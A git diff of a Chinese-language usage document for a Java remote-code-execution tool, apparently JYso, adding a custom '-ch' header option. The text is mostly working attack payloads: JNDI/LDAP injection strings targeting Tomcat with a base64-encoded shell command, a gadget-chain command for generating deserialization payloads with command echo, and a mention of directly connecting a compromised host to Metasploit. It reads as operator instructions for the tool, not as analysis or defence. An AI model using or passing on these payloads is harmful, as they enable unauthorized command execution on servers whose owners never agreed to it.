diff --git a/4、JAVA-RCE-Echo.md b/4、JAVA-RCE-Echo.md index fa305f2..33bdc9d 100644 --- a/4、JAVA-RCE-Echo.md +++ b/4、JAVA-RCE-Echo.md @@ -28,6 +28,8 @@ 使用时在 Header 中加入 `X-Token-Data` 也可以自行指定,其值为待执行的命令,命令执行结果将回显在 response 中。 +通过参数`-ch cmd`来自定义 + + JNDI-Injection-Exploit 用法: + 不需要参数时 ``` @@ -36,12 +38,12 @@ ${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho} + 需要参数时 ``` -${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/LWNoIENvb2tpZXNz} +${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/[base64_encoding:-ch cmd]} ``` + ysoserial ``` -java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" +java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" -ch "cmd" ``` - 支持tomcatBypass路由直接上线msf: